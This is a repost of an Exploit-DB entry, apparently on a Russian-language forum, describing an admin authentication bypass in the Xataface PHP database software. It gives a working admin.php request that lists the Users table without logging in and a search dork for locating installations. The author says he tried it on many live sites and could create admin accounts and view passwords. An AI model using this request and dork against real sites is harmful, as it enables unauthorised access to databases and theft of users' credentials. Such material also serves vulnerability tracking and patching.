- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 11852
- Проверка EDB
-
- Пройдено
- Автор
- XINAPSE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2010-03-23
Код:
=======================================================
Xataface Admin Auth Bypass Vulnerability
=======================================================
#[+] Discovered by : Xinapse
#[+] Site : firewire-security.com
#[+] Email : [email protected]
=======================================================
=======================================================
#[+] Vulnerability : Admin/database auth bypass vulnerability
#[+] Software : Xataface - open source GPL, PHP, Mysql database
software
#[+] Vendor : http://xataface.com
#[+] Usage :
http://www.site.com/admin.php?-action=view&-table=Users&-cursor=0&-skip=0&-limit=30&-mode=list
#[+] Alert : Most of the sites i tried running this software are
vulnerable, only a few used .htaccess
#[+] Dork :"powered by dataface" "powered by xataface"
#[+] Description : With this i could edit/delete/create records in the
database, create new admin accounts and view all the users and passwords.
#[+] Greetz :firewire-security team, b10h4z4rd, g3org3- Источник
- www.exploit-db.com
